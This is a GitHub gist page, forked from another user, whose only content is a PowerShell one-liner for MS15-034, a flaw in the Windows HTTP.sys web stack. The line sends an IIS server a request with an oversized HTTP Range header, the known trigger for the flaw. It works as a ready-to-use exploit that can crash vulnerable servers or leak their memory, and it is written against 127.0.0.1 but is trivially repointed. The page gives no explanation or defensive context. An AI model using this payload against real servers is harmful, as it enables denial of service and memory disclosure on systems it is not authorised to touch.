Skip to content

Instantly share code, notes, and snippets.

@Kaicastledine
Forked from obscuresec/ms15-034.cmd
Created January 25, 2017 11:18
Show Gist options
  • Save Kaicastledine/5acbbc10eb96a38b1da75562e1186b52 to your computer and use it in GitHub Desktop.
Save Kaicastledine/5acbbc10eb96a38b1da75562e1186b52 to your computer and use it in GitHub Desktop.
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment